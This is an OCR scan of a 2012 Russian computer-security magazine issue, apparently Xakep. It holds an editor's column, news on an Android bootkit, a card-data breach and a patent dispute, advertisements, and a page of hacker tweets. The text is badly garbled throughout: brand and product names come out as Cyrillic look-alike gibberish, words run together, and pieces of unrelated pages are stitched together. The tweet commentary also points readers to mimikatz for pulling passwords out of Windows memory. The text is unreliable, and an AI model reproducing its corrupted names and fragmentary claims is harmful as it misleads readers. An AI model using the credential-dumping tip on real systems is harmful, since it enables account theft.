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НЕУПУСКАЙ ВОЗМОЖНОСТИ 

Мой дедушка — кандидат медицинских наук, известный в Твери 
хирург. Он нередко делится со мной историями из своей жизни 
и рассказывает о своем профессиональном пути. Каждый раз, 
слушая его, я невольно сравниваю «условия тогда» и «условия 
сейчас» и пони маю две вещи. Какие же мы все-таки везунчики, у 
нас есть возможности для развития, которых никогда раньше не 
было. И какие мы, черт подери, дураки, что многие из этих возмож- 
ностей не используем или вообще игнорируем. 

Простой пример. Как часто ты задумываешься, что надо найти 
какую-то книжку? Да практически никогда, потому что любое, 
даже очень редкое издание сейчас можно купить онлайн и, чего 
греха таить, иногда даже бесплатно скачать с то ррентов. Раньше 
же поиск хороших книг превращался в настоящую охоту, а многие 
издания были доступны только водном месте — в библиотеке. 

Возможность съездить на профессиональную конферен- 
цию, где сдокладами выступают настоящие мастодонты своего 
дела, раньше была редкой удачей и везением. Сейчас онлайн- 
трансляции (в ЕЮ да еще на разных языках] стали чуть л и необяза- 
тельным атрибутом любой хорошей конфы. Смотри — не хочу. 

В Сети развиваются профессиональные сообщества, где можно 
поделиться опытом и получить реальную консультациюу своих 
коллег. Можноли было представить еще Іблетназад, что самые 
прорывные люди своего дела не только России, ной вообще миро- 
вого уровня будут на расстоянии всего одного етаіі? 

Технологии бесповоротно меняют подходы кобучению: раз- 
рабатываются целые платформы для удаленного образования. 

В этом пока не преуспели отечественные вузы, нозатоавторитет- 
нейшиетехнические МП и Стэнфордский университет позволяют 
пройти настоящие курсы с упражнения ми и экзаменами. 

Я вотчтохочу сказать. Двигайся вперед. Стремительно и на- 
пористо. Еще никогда у нас не было столько возможностей для 
развития, а упускать их и не реализовывать себя — это чистейшей 
воды глупость и даже преступление. 

5Іер,гл.ред.Х 



Р.5. Забавно. Я написал в ][ более четырехсот статей и колонок. Авот 
Іпіго пишу впервые. И в этом, по ощущениям, есть что-то особенное. 
Рад приветствоватьтебя, будучи в новой должности :). 
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ТКЕИОМІСКО ПРИЗНАЛИ АЙОВОЮ САМОЙ 
НЕБЕЗОПАСНОЙ МОБИЛЬНОЙ ОС. 

Самой защищенной, по их мнению, 
является ВІаскВеггу70БотРІМ. 



МТС НЕЧАЯННО АТАКОВАЛА 
СМАРТФОНЫ 5АМ51ІЫ6 

О «СТРАШНОМ ВИРУСЕ» «МТС МОБИЛЬНАЯ ПОЧТА» 



ХРАНЕНИЕДАННЫХ 
НА ДИСКАХ ЕЩЕ 
НЕВПРОШЛОМ 



□ прошлом месяце владельцев смартфонов 5а тзипд по 

всему миру не на шутку перепугал неизвестный страшный 
вирус. Имя этому вирусу был о «МТС Мобильная почта» :). 

В один прекрасный день пользователи смартфонов 5а тзипд на 
базе АпсІгоісІ стали обнаруживать на своих устройствах непонятное 
приложение «МТС Мобильная почта» (МТ5 МоЬіІе МаіІ). Мало того что 
они его никогда не устанавливали, так оно еще и на русском! 

Приложение просто находили в списке программ, доступных 
для обновления в Соодіе РІау (бывший АпсІгоісІ Магкеі). Ситуацию 
осложняло то, что эта фигня требовала полного доступа к различ- 
ным функциямтелефона, включая и раздел 5М5, что, разумеется, 
тутже вызвало подозрения о ее вредоносном характере. Ктому же 
у большинства юзеров не получил ось уда лить приложение — любые 
попытки приводили ктому, что оно восстанавливалось. 

Паника, тысячи постов в блогах и самые разные догадки. Спустя 
некоторое время в МТС на конец объяснил и ситуацию. Вина за 
несанкционированную установку почтового приложения в АпбгоісІ- 
смартфоны легла на разработчика программы. Оказалось, причиной 
«эпидемии» стало совпадение специальных идентификаторов Арр 
Ю «МТС мобильная почта» и почтового приложения 5атзипд в ма- 
газине приложений Ооодіе РІау. Обе программы фигурировал и там 
под Ю сот.зеѵеп.27, что и привело к самопроизвольной установке 
«Почты МТС» на тысячи смартфонов. Классный трюк! 



► ріау — * 




Представители МТС подчеркивают, чтосамоустанавливающеесяприложение«МТС 
мобильная почта» имеет все необходимые лицензии, не является вирусом и не опас- 
но для пользовательскихустройств. 



50ЫѴ ПРЕДСТАВИТ НОВОЕ РЕШЕНИЕ НА БАЗЕ СТАРОЙ 
ТЕХНОЛОГИИ 




а к известно, компакт-диски, которые в этом году отмечают 
тридцатилетие с момента выхода на рынок, были созданы 
компаниями 5опу и РЫІірз. Пока другие производители 
ориентируются на хранение данных в облаках, на ИВО и 550, 5опу 
решила обратить свое внимание на старые добрые диски. Японская 
корпорация намерена предложить рынку систему архивного 
хранения данных на оптических дисках. Более того, Бопууже 
сформировала организацию Оріісаі йізс АгсЬіѵе Асіѵізогу Сгоир, 
цель которой — продвигать новый формат носителей в разных 
отраслях. Сообщается, что новая система 5опу будет ориентирова- 
на на долговременное хранение информации, а значит, носители 
будутустойчивы к перепадамтемпературы и влажности, воз- 
действию пыли и воды. Важным достоинством системы является 
совместимость между поколениями оборудования, избавляющая 
от необходимости переноса архивных копий на новые носители. 

К осени текущего года 5опу планирует выпустить несколько видов 
оптических дисков для архи в но го хранения данных, которые будут 
совместимы с приводом 005-05511 (СЮС1500Р). Это устройство 
открывает новую линейку оборудования, оснащается интерфейсом 
115В 3.0 и поддерживает носители объемом от 300 Гб до 1,5 Тб. 





ТѴѴПТЕКНЕ 

СМОГКУПИТЬ 

Ш5ТА0КАМ, 

А РАСЕВООК'У ЭТО 
УДАЛОСЬ. 

За миллиард 
баксов! Причем 
изначально 
речьшлаодвух 
миллиардах, но 
Цукербергсумел 
сбить цену. 




ПЕРВЫЕ СМАРТФОНЫ НА 
БАЗЕ0СВ00ТТ0СЕСК0 

(разработку которой ведет 
МоііІІа) появятся в продаже 
в Бразилии. Релиз намечен 
на конец 2012 или начало 
2013года. 




В НОВОМ ІРАО ОБНАРУЖИ- 
ЛАСЬ ПРОБЛЕМА — не- 
стабильное подключение 
к 36-сетям. Девайсто и дело 
теряетсоединениеине 
можетвосстановитьего без 
ребута. 




ЯНДЕКСЗАПУСТИЛ 
СОБСТВЕННОЕ ОБЛАЧНОЕ 
ХРАНИЛИЩЕ ФАЙЛОВ— Ян- 
декс. Диск ( сПзк.ѵапсІех.ги ). 
Правда, пока сервис работа- 
еттолько по приглашениям. 
Илиуженет?:) 
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ПОРАЖЕНИЯ ПРИХОДИШЬ К ПОБЕДАМ 



Г 



Т 1 



Жизнь Алексея Немова — это жизнь вопреки. Вопреки опасным диагнозам врачей, Алексей остался в спорте и стал 
четырехкратным олимпийским чемпионом. Вопреки поражению на афинской Олимпиаде, в глазах людей он стал триумфатором. 
Вопреки традиции становиться тренером после ухода из спорта, он создал свое гимнастическое шоу. Преодоление у Немова в крови. 
Он ставит цель, достигает ее и идет дальше. Свой любимый вид спорта Алексей развивает и сегодня, уже на общероссийском уровне. 
А завтра... Он не загадывает. Ведь в жизни слишком много возможностей, чтобы ограничиваться лишь одной мечтой. 



КЕЕР ѴѴАЬКШС 




Узнайте его историю: іоНппіеѵѵаІкег.сот/\л/аІк\/ѵі{б§іап1:5 




у / 

Тоешше ѴѴаькек X V 

^ О уму г, о „ л о 



Употребление алкоголя требует меры и ответственности. Узнайте больше на ѵѵѵѵѵѵ.бгіпкір.сот. 

© ЗАО «Д Дистрибьюшен» - уполномоченный импортер продукции под товарным знаком в России, 2012. Реклама. 




МЕ6АЫЕѴѴ5 



УСТАРЕВШИЕ ВЕРСИИ .ІАѴАС КРИТИЧЕСКИМИ УЯЗВИМОСТЯМИ используются на 60-80% компьютеров. 



КЛИКАЙ БЕЗЗВУЧНО 

МЫШЬДЛЯ ПОЛЬЗОВАТЕЛЕЙСОСПЕЦИФИЧЕСКИМИТРЕБОВАНИЯМИ 




□ есшумной клавиатурой сегодняуже никого не 
удивишь: подобный девайс может пригодиться 
в самых разных случаях, как из чисто практи- 
ческих, так и из эстетических соображений. Однако не 
многим известно, что в дополнение к «тихой» клавиатуре 
можно подобрать такую же мышь. Недавно компания 
ІМехиз, более известная какпроизводитель кулеров, 
корпусов и блоков питания, анонсировала целуюлинейку 
бесшумных беспроводных мы шей ЫХТЕКБМ -5000 с опти- 
ческим датчиком. Бесшумность «грызунов» обеспечивает 
запатентованная технология беззвучно срабатывающих 
кнопокБіІепіБѵѵіІсЬ. Этаже технология применяется и в 
других изделиях ком па нии, например в компьютерной 
мышке5М-8000. Манипуляторы ІМХТЕК5М-5000 имеют 
встроенный переключатель разрешения оптического дат- 
чика: можно установить значение 1000, 1200 или 1600 точек 
на дюйм. Также модели ІМХТЕК5М-5000 оснащены двумя 
колесиками прокрутки. Мыши подключаются к компьюте- 
ру по радиоканалу на частоте 2,4 ГГц с помощью входящего 
в комплектминиатюрногоприемника. Дата начала продаж 
и цена, ксожалению, неизвестны. 



В Мехи5 отмечают, 
что«тихие»мыши, 
кпримеру, вос- 
требованы многими 
звукозаписываю- 
щимикомпаниями 
ителестудиями. 




НАСВОБОДНОМ ПО МОЖНО ДЕЛАТЬ БОЛЬШИЕ ДЕНЬГИ 



КЕО НАТ СТАЛА ПЕРВОЙ 
КОМПАНИЕЙ В МИРЕ ОРЕЫ 
501ІКСЕ С ОБОРОТОМ БОЛЕЕ 
МИЛЛИАРДА ДОЛЛАРОВ. ВОТ 
ОНА, ЦЕНА ОТКРЫТОСТИ :). 



ПАТЕНТНЫЕ ВОЙНЫ: 
СВОДКИ С ПОЛЕЙ 

ЛИНУСТОРВАЛЬДС «ОБЕЗВРЕДИЛ» 

ОДИН ИЗ КЛЮЧЕВЫХ ПАТЕНТОВ МІСК050РТ 

□ последние годы излюбленным рычагом давления 
на конкурентов в Кремниевой долине стали 
патенты. Все патентуютвсё, миллионы долларов 
тратятся на перекупку патентов у других компаний, и на 
основании всегоэтого всесудятся со всеми. 

Также на сегодняшний день многие производители 
мобильных устройств на базе ОС АпсІгоісІ выплачивают 
патентные отчисления компании М іеговой. Л ишь малое 
число компаний отказались подписать подобные согла- 
шения с М іеговой, и среди этих компаний была Моіогоіа. 
Разумеется, МісгозоЙэто неустроило, и в октябре 2010 
года компания подала судебный иск. В ответ Моіогоіа 
подала жалобу на М іеговой в Комитет по междуна- 
родной торговле США (ЕІ пііесі Біаіез Іпіегпайопаі Тгасіе 
Соттіззіоп, ІТС]. В декабре 201 1-го судья по администра- 
тивным делам согласился, что Моіогоіа нарушила четыре 
патента, принадлежащих МісгозоЙ. 

Однако данное решение может сделать недействи- 
тельным один из важных патентов МісгозоЙ, который 
известен как патент 352. Он касается единого простран- 
ства имен для длинных и коротких имен файлов и уже не 
раз фигурировал в известных патентных исках МісгозоЙ, 
например против компании Вагпез & ІМоЫе. Дело в том, 
что уже после суда сотрудники Моіогоіа отыскали в сети 
старое сообщение Л и нуса Торвальдса об использовании 
длинных имен файлов, совместимых с короткими име- 
нами, в связи с чем Л инус да л показания по поводу этого 
технического обсуждения двадцати летней давности, 
а также по поводу сообщения в электронной конференции 
сотр.зуз.аІагі.зиесЬ. Стоит сказать, что обсуждение 
имело место за три года до выдачи патента. По словам 
Торвальдса, юристы МісгозоЙ несколько раз переспраши- 
вали, действительно л и он уверен в точности этой даты. 
Хотя дата потом была перепроверена в другом архиве, они 
продолжали давить на него этим вопросом. 

Как бы то ни было, показания Торвальдса убедили 
административного судью в том, что патент 352 не имеет 
силы, что и было зафиксировано в общем решении. Реше- 
ние пока является первичным и в данный момент рассма- 
тривается согласно регламенту. Поскольку ІТС является 
торговой, а не судебной инстанцией, федеральные судьи 
могут вовсе проигнорировать это решение. Впрочем, 
многие федеральные судьи внимательно следят за тем, 
что происходит в ІТС. Если решение остается в силе, то, 
по мнению многих юридических обозревателей, вопрос 
может статьоченьсерьезным. Пословам исполнитель- 
ного директора компании Ореп Іпѵепйоп ІМеІѵѵогк, это 
патентсдолгим и интересным прошлым и дело касается 
нетолькооткрытогосообщества, но вообще каждого. Тем 
не менее, известный исследователь проблемы патентов 
и патентныхпротивостояний, касающихся Ореп Боигсе, 
Флориан Мюллер метко замечает, что у МісгозоЙ есть в за- 
пасе огромное количество патентов, «которые можно ис- 
пользовать, добиваясь финансовых отчислений. Тот фа кт, 
что МісгозоЙ часто используют какой-то один патент, 
трактующий файловые системы, не означает, что у них нет 
других патентов». Мюллертакже считает, что софтверный 
гига нт скорее всего подаст апелляцию в Федеральный 
апелляционный суд да иного федерального округа и точка 
в этом вопросе будет поставлена еще очень не скоро. 
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I — I — I 



ву$нміи_$ 



5ІІЧСЕ ѴѴАѴ ВАСК 



В первую очередь эти парни — верные друзья. 

И только во вторую очередь — известная российская группа ІІта2гтаН. 









МЕ6АЫЕѴѴ5 



ПЛАТЕЖНАЯ СИСТЕМА РАѴРАІ. ВЫЙДЕТ НАРОССИЙСКИЙ РЫНОК, и ее партнером станет «Почта России». Они нашли друг друга! 



ОБНАРУЖЕН ПЕРВЫЙ 
БУТКИТ ДЛЯ АЫБРОЮ 

МОБИЛЬНАЯ МАЛВАРЬ ПРОДОЛЖАЕТ РАЗВИВАТЬСЯ 




□ о время отслеживания и анализа эволюции 

вариантов ранее известной мал вари ОгоібКипдРи 
в исследовательском центре N0 МоЬіІе Зесигііу 
обнаружили программу ОКРВооЖіІ. Софтинуужеокрести- 
ли первым АпбгоісІ-буткитом. Хотя ОКРВооЖіІ использует 
ранее известныеспособы внедрения боевой нагрузки 
в обычные приложения, он специально выбирает для за- 
ражения именноте приложения, которыетребуютрутовых 
привилегий. Для распространения ОКРВооЖіІ использует 
легальные программы, производит их пересборку (вклю- 
чая в нихсвой вредоносный код) и втаком виде распростра- 
няется поСети. Кмодифицируемым программам прежде 
всего относятся утилиты мониторинга системных ресурсов, 
антивирусы и некоторые игры. ОКРВооЖіІ внедряется 
в процессзагрузки оригинальной системы Апбгоіб и под- 
меняет ряд системных утилит из каталога «/зузІет/ІіЬ» 
(например, НюопЬд и тоипі) и демонов (ѵоіб и беЬиддегб). 
Рооі-права позволяют йКЕВооЖб: производить любые 
действия, связанные с управлением приложениями и дан- 
ными, размещаемыми на Апбгоіб-устройствах. Крометого, 
ОКРВооЖіІ является ботом, ожидающим управляющих ко- 
манд с серверов. Исследование показало, что большинство 
доменов для сер веров управления ОКРВооЖіІ зарегистри- 
рованы в январе 2012 года. 



Пока выявлено 
лишьнесколько 
сотензаражений 
ОКРВооІКіІ, неспе- 
циалисты ожидают 
значительногоуве- 
личенияэтой цифры 
ужевближайшем 
будущем. 




УНИВЕРСАЛЬНОЕ ПЕРО 
ДЛЯ ВСЕГО И СРАЗУ 

МНОГОФУНКЦИОНАЛЬНЫЙ ГАДЖЕТ ОТ ѴѴАСОМ 

омпания ѴѴасот хорошо известна на российском 
рынкеблагодарясвоим графическим планшетам. 
Пожалуй, можно без малейшего преувеличения 
сказать, что устройства ѴѴасот — одни из лучших в своей 
области. Но недавно компания представила гаджет для 
более широкой публики. Перо ѴѴасот ВатЬоо Зіуіиз био 
объединяет в себе сразу два устройства. С одной стороны, 
перо можно использовать для взаимодействия с сенсор- 
ными экранами планшетов и смартфонов (подходит для 
емкостныхэкранов, которыми, в частности, оснащаются 
планшеты Арріе і Раб). С другой стороны, перо выполняет 
функцию обыкновенной ручки. Причем словосочетание 
«с другой стороны» нужно воспринимать буквально. 
Противоположный конец пера представляет собой чер- 
ную шариковую ручку со сменными стержнями с шариком 
диаметром 0,7 мм. Разработчики ѴѴасот ВатЬоо Зіуіиз 
био поэтично заявляют, что связали в одном изделии 
цифровой и аналоговый мир. В комплект устройства 
входитколпачок, подходящий для обоих концов пера. 
Продажи ѴѴасот ВатЬоо Віуіиз био начнутся в мае по 
цене 34,90 фунта стерлингов (примерно 50 долларов). 
Вместе с необычным пером было анонсировано и прило- 
жение ѴѴасот ВатЬоо Рарегдля іРаб и Апбгоіб. С мая 2012 
года его можно будет бесплатно загрузить из Арріе Арр 
5іоге и Соодіе РІау. 





Обычно смартфоны про- 
изводятся на платформе, 
в основе которой лежит 
АРМ-процессор. Нотеперь 
на рынке появился новый 
игрок. С 23 апреля начались 
продажи первого смарт- 
фона на процессоре Іпіеі. 
Интересно, что первый 
смартфон Іпіеі появился не 
в США и даже не в Европе, а в 
Индии. Это модельХоІоХ900 
откомпании І_аѵа, ведущей 
бизнес исключительно 
в родной стране. 





МСАРЕЕ ВЫПУСТИЛА БЕС- 
ПЛАТНОЕ ПО ДЛЯ УПРАВЛ Е- 
НИЯ БД МѴБОЬ И ИХ МОНИТО- 
РИНГА. Инструмент призв-ін 
помочь выявлять возможные 
проблемы безопасности. 



ВСЕРВИСЕ ООООЬЕ 5ТРЕЕТ 
ѴІЕѴѴ ИНТЕРЕСНОЕ ОБНОВЛЕ- 
НИЕ— появилась возмож- 
ность виртуально путеше- 
ствовать по рекам и лесам 
бассейна одной из крупней- 
шихв мире рек— Амазонки. 
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КАЖДУЮ НЕДЕЛЮ 
НАШ КОЛУМНИСТ 
О ФУТБОЛЬНОЙ 
КУЛЬТУРЕ 



ГЕРОИ И ЗЛОДЕИ 
АНГЛИЙСКОЙ 
ПРЕМЬЕР-ЛИГИ 
ПО ПОНЕДЕЛЬНИКАМ 



ЯЕАОЕР@ѲІ_С.ЯЦ 
ИЩЕМ АВТОРОВ. 
ПРИСЫЛАЙТЕ 
ИНФОРМАЦИЮ О СЕБЕ 



ЕЖЕНЕДЕЛЬНИК 
В ЭЛЕКТРОННОМ 
ФОРМАТЕ ВЫХОДИТ 
В СУББОТУ УТРОМ 



СКАЧАЙТЕ КОПИЮ НА ЧЕМПИОНАТ.СОМ В ФОРМАТЕ ЭЛЕКТРОННОЙ КНИГИ .ЕРІІВ / .РОР / .МОВІ — БЕСПЛАТНО 



Реклама 




МЕ6АЫЕѴѴ5 К 2016 ГОДУ ГАДЖЕТОВ НА БАЗЕ ОС ДЫРКОЮ станет больше, чем ПК и ноутбуков на базе ОС семейства ѴѴіпсІоѵѵз, считают аналитики ЮС. 



НОВЫЙ ПРОЕКТѴѴІКІМЕОІА РОЫІ N ОАТІОЫ 

ОТКРЫТАЯ БАЗАЗНАНИЙ О МИРЕ, КОТОРУЮ МОГУТ ЧИТАТЬ И РЕДАКТИРОВАТЬ КАК ЛЮДИ, ТАК И МАШИНЫ 





онд ѴѴікітесІіа анонсировал новый проект — 
ѴѴікісЫа. Планируется создатьдоступную для со- 
вместного наполнения структурированную базу 
данных, в которой будут собраны самые разные сведения 
изнания. ѴѴікібаІа предполагают вести на всехязыках, 
доступных в ѴѴікітесІіа, проект должен стать центра ль- 
ны м и единым хранил ищем данных для всех проектов 
ѴѴікітесІіа. При мерно так же ѴѴікітесІіа Соттопз высту- 
пает центральным хранилищем мульти медийных файлов 
для всех остальных проектов. За последние семь лет это, 
пожалуй, первыйзначительный проектѴѴікітесІіа. На раз- 
работку начального прототипа ѴѴікісЫа уже выделено 1,3 
миллиона евро, половина из которыхбыла пожертвована 
Институтом решения проблем искусственного интел- 
лекта (АІ 2 ), созданным Полом Алленом. Остальную часть 
финансирования предоставили компания Ооодіе и фонд 
Оогсіоп апсі Веиу Мооге Роипсіаііоп. Разработка ѴѴікісЫа 
будет разделена натри фазы. Первую фазу планируется 
завершитьуже в августе текущего года — до конца лета 
будетпроведена централизация ссылок между версиями 
ѴѴікіребіа на разныхязыках. На второй стадии, результаты 
которой планируется представить в декабре 2012 года, ре- 
дакторы получат возможность добавлять и использовать 
данные в ѴѴікісЫа. В финальной фазе появятся средства 
для автоматического создания списков и схем, основан- 
ных на данных в ѴѴікібаІа. 

Зачем вообще нужна ѴѴікісЫа? Чтобы снабжатьструк- 
турированной информацией компьютерные программы. 
Нам явно необходим некий единый формат и общий способ 
для всех компьютеров, как извлекатьзнания о мире, будь 
то информация о часовых поясах, координаты городов 
мира или дни рождения известныхличностей. Всеэти 
данныедолжны бытьдоступны компьютерам черезеди- 
ный интерфейс. 

Приведем простой пример. В ѴѴікібаІа можетбыть 
сохранена численность населения определенного 
города, ккоторой вдальнейшем можно обращаться из 
статей ѴѴікіребіа по ключу с названием города и атри- 
бутом, ассоциированным с численностью населения. 

При необходимости изменить информацию достаточно 
будет поправить запись в базе да иных, после чего во всех 
статьях эн ци клоп един, у пом ина ющих числен ность на- 
селения города N1, будутиспользоваться новые сведения. 
То есть отпадает необходимость вручную выискивать 
и править все эти статьи. Кроме численности населения, 
можно сопоставить с городом различные географические 
и политические сведения, такие как имя мэра, телефон- 
ный код итакдалее. Всеэтиданныебудут доступны не 



Б КУРЕ ОПЯТЬ РАЗРЕВЕРСИЛ И 



только для ручного редактирования, но и для полностью 
автоматизированной машинной обработки. Данные могут 
быть задействованы в самых разнообразных сторон них 
приложениях, например в системах аннотирования науч- 
ных статей. Система будет поддерживать гибкие средства 
локализации, что позволит хранить ед иные представле- 
ния фактов на всехязыках, поддерживаемых в ѴѴікіребіа 
(дажеесли статья не переведена, для всехязыков можно 
будет вывести типовые факты). Данные будут предостав- 
ляться на условиях лицензии Сгеаііѵе Соттопз. 



ѴѴікісІаІа должна имѳтьуспех, ведь 
уже сегодня существуют проекты, 
которые извлекают данные из 
ѴѴікіресІіа и публикуютихвструк- 
турированном виде, к примеру 
РгееЬазе І ігееЬазе.сот ) и йВресііа 
І сІЬресІіа.огд ). 



ОПУБЛИКОВАН РАСШИФРОВАННЫЙ 
БИНАРНЫЙ ФАЙЛ 5КѴРЕ V. 5.5. 
ТЕПЕРЬ МОЖНО ЗАПУСКАТЬ 
5КѴРЕ В ОТЛАДЧИКЕ. 
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Алексей Синцов 



Ьаскегіѵѵееіз 








гаігоуИипІ: 

У меня была проблема. Я напи- 
сал гедехр. Теперь у меня две 
проблемы... 



(ВоБапоѵа: 

Я такая старая, что помню 
время, когда не было безглазых 
смайликов. 




(ЭросІ2д: 

Новости: у нас есть все необхо- 
димые для )аіІЬгеак эксплойты. 
Работаю над обходом А5І_Р. 



ГаРодипіх: 

«Іпіедег ОѵегОоѵѵ» исследование 
^ и тулза — еаі . 

Н Комментарий: 

Любопытный материал про автомати- 
ческое нахождение ситуаций целочисленно- 
го переполнения. 




(Зсіітадіс: 

Проблемы всегда в курсе, когда я 
занят другими делами. 



(Э5есигі(уВога(: 

Сегодня Петр попросил меня 
открыть файрвол, чтобы он 
мог достать Асііѵе йігесіогу. 

Я спросил его, могу ли я уединиться с его 
женой. Он сказал — нет. Вот именно! 






— I гаіеггогоЬе: 

Обход А5І_Р с помощью РІазЬ — 
- вечеринка в стиле '99: 

Ьир:/Л.со/Ц 0 б 2 па (предостав- 
лено (ЭЦзегпа #зесигі*у #т*о_1еак). 



(Эаагопрогіпоу: 

Цитата дня: «Покупка ЮА — это 
сплошная головная боль. Я знал, 
что реверс-инженеры все дино- 
завры, но использовать факс для отправки 
форм заказа? Вы что, серьезно?» 



ГЭІакіѵѵ: 

«Раза *Ье НазЬ» это так 2011. 
Теперь уже «Раза *Ье Раза». 



□ Комментарий: 

ѴѴіпсІоѵѵз сохраняет в памяти пароли 
аутентифицированных пользователей до 
перезагрузки, так что можно их выдернуть 
прямо оттуда. Если интересно, гуглите 
«тітіка* 2 » 8) 



а (Зп00Ьгпе(: 

Я нашел новый 0-сІау 
в ВаскТгаск... Пароль по умол- 
чанию — *оог. Вы получите 
г00*! ВСЕ ИНСТАЛЛЯЦИИ ПО УМОЛЧАНИЮ 
УЯЗВИМЫ. Патч через раззѵѵсі. 

Н Комментарий: 

Сарказм на тему недавнего РР одной 
компании, которая занимается тренингом 
по ИБ. Типа, они нашли там уязвимость 
в ВаскТгаск, позволяющую поднять при- 
вилегии. 



СІ 



гашшз: 

Мой ІѴР-доклад и видео 
— /Д.со/ЬРЦРВУИ 

#ВІаскЬа*Еи. 

Н Комментарий: 

Почти что олдскул хакинг. Советую 
оценить и презентацию и видео по ссылке. 
Тема — взлом ІѴР-приложений по теле- 
фонной линии. ІѴР — это робот, который 
отвечает на телефонные звонки в разных 
учреждения («Для выбора русского языка 
нажмите 1 » и так далее), в том числе 
в банке. Через этот функционал, напри- 
мер, можно узнать информацию о счете или 
заблокировать свою карту. Так вот, на ВІаск 
На* ЕІІ был доклад от РаЬиІ Зазі, как это 
дело ломать: от брутфорса до инъекции ЗОБ 
через РТМЕ. 




ГЭтікко: 

РЬгаск #68 із ои*. 

АНтѵѵСШ. 



Н Комментарий: 

Кто не в курсе, РЬгаск — самый 
уважаемый технический хакерский е-зин. 
Написать статью туда — это все равно что 
стать легендой :). Первый номер вышел аж 
в 1985-м! 



(Ззігсру: 

(сКаѵізо, вот что ЙтсІоѵѵсІ говорит: 
«І_ОЦ ты должен был причитать 
мою книжку и сэкономить себе 



время». 



□ Комментарий: 

Тэвис Орманди нашел уязвимость 
переполнения буфера в куче в 0реп55І_. 
Однако эту же багу нашел Марк Доуд в 2006 
году! Более того, он описал ее детали 
в своей книжке, которая всем доступна. :) 



(ЗпООЬгпеІ: 

ИнфоБез — это война, и каждый 
солдат имеет свой ствол. Не 
забывай про это в качестве свое- 
го основного оружия. 






-У) 



СВдеоѵесІі: 

Нерды — просто люди, которые 
горят чем-то достаточно, чтобы 
тяжело над этим работать. 




ГаОхсНагІіе: 

Я говорил, что мой доклад на 
НІТВ АМ5 был отклонен? Если 
не считать Р5А, это случилось 
в первый раз начиная с 2007-го. 

Комментарий: 

Да ладно, мой тоже они отклонили 
:). И тоже в первый раз со мной такое... 

Не переживай, Чарли, зато порадуйся 
за Никиту Тараканова и Александра 
Бажанюка: их доклад на тему автоматизи- 
рованного поиска багов был принят. 
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МЕ6АЫЕѴѴ5 



В ОДНОМ ИЗ БЛИЖАЙШИХ РЕЛИЗОВ ОРЕКАпоявится функция захвата видеопотока с камеры через НТМІ.5 Сапѵаз. 



КАК ПОТЕРЯТЬ 
ДЕСЯТЬМИЛЛИОНОВ 
ПЛАСТИКОВЫХ КАРТ 



АйОВЕ ОБЛАГАЕТ 
ПРОГРАММИСТОВ 
ДАНЬЮ 



ѴІ5А И МА5ТЕКСАК0 ПОПАЛИ В НЕПРИЯТНУЮ ИСТОРИЮ 




Нестоитзабывать, 

чтоѴІБаиМазІегСагсІ 

невыпускаютпла- 

стиковые карты, — 

этимзанимаются 

банки. 



течка данных о пластиковых картах — в наши дни дело, увы, обычное. 
Однако в недавнем инциденте поражает масштаб случившегося — как 
видно из заголовка новости, речь идет предположительно о десяти 
миллионах карточек. Прокол вышелу компаний Ѵіза и МазІегСагсІ, которые 
в начале а прел я у ведомил и а мери канские банки об утечке данных. Так как 
официальныхкомментариев компании почти недавали, некоторые подроб- 
ности этой истории раскрыл в своем блоге эксперт по сетевой безопасности 
Брайан Кребс. Сославшись на свои источники, Кребс написал, что данные 
«утекли» еще в двадцатых числах февраля, причем в руки хакеров могла 
попасть и конфиденциальная информация, с помощью которой карты можно 
подделать. Кстати, цифру десять миллионовтакже обнародовал Кребс. 

Позжеситуация прояснилась. Процессинговая компания СІоЬаІ Раутепіз 
признала, чтоутечка стала следствием взлома еебазы. Неизвестныехакеры 
экспортировали сведения «менее чем о полутора миллионах карт». Злоумыш- 
ленники узнали только их номера. Часть базы с ФИО владельцев карт, их адре- 
сами и номерами социального страхования украдена небыла.Ѵіза предпочла 
исключить ОІоЬаІ Раутепіз из списка своих сертифицированных партнеров. 
МазІегСагсІ пока проводит расследование ситуации. Впрочем, даже если 
в руки хакеров попали данные «всего» о полутора миллионах карточек, случай 
всеравноскверный. 



УСПЕШНЫЕ РІ.А5Н-ПР0ЕКТЫ 
ПОПРОСЯТ«ПОДЕЛИТЬСЯ» 

дновременно с выпуском РІазГі РІауег 11.2 компа- 
ния АбоЬеБузІетз рассказала о том, какплани- 
руетполучатьдополнительную прибыльза счет 
работы этого плагина. Напомним, что раньше компания уже 
взимала плату с разработчиков, которые применяли допол- 
нительные средства для разработки (например, РІазЬ Рго). 
НотеперьАбоЬерешила пойтидальше. С 1 августа 2012 
года компания собирается взимать платусразработчиков 
любых компьютерных игр, использующих ряд прем иаль- 
ныхфункций РІазГі РІауег. АсІоЬе потребуетотчислять9% 
отчистой выручки за использование премиум-функций, 
если проект при носит свыше 50 000 долларов выручки. 
Кпремиум-функциям компания относит ряд трехмерных 
возможностей, доступ к функциям для аппаратного уско- 
рения графики, улучшенный механизм работы спамятью 
для консервации игр, которые изначально были написаны 
на С или С++. Не платить можно только в двух случаях: если 
приложения, использующиепремиум-функции, изданы до 
1 августа (таковые получатбесплатнуюлицензию) и если 
приложение работает под АІР 3.2, как в виде самостоятель- 
ного продукта, так и в Ю5 или АпсІгоісІ. 






ЭКСПЕРТЫ «ЛАБОРАТОРИИ 
КАСПЕРСКОГО» обнаружили 
вредоносные расширения 
для ОоодІеСЬготе, призы- 
вающие юзеров скачивать 
фейковые программы для 
РасеЬоок. 




ПРЕДСТАВЛЕНА ПЕРВАЯ 
СТАБИЛЬНАЯ ВЕРСИЯ 
ЯЗЫКА60, получившая 
название боі. Доступны 
дистрибутивы ДЛЯ ѴѴІПСІ0ѴѴ5, 
Мае ОБХ, РгееВБО и ОС на 
ядреЫпих. 




25% ПОЛЬЗОВАТЕЛЕЙ 
НИКОГДАВЖИЗНИ НЕ ДЕ- 
ЛАЛИ БЭКАП,сообщаетнам 
ВІаскЫаіе. Еще 51% пользо- 
вателей делают резервное 
копирование данных реже, 
чем раз в год. 




В АВСТРИИ ПОЛИЦИЯ 
АРЕСТОВАЛА 15-ЛЕТНЕГО 
ШКОЛЬНИКА, дефейс- 
нувшего за три месяца 259 
сайтов! Пареньсделал это 
исключительно из спортив- 
ного интереса. :) 




ОБЛАКО АМА20НАѴѴ5 
ГЕНЕРИРУЕТ 1% ВСЕГО 
ИНТЕРНЕТ-ТРАФИКА в Се- 
верной Америке. Ежедневно 
какой-либо контенте АѴѴ5 
загружает каждый третий 
пользователь интернета. 
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ДВАНЕОБЫЧНЫХ 
МОНИТОРА ОТ РНІЫРЗ 

МОНИТОРЫ ПОЗАБОТЯТСЯ О ТВОЕМ ЗРЕНИИ И ОСАНКЕ 



ПЕРВАЯ В МИРЕ 




Монитор ВгіІІіапсе 
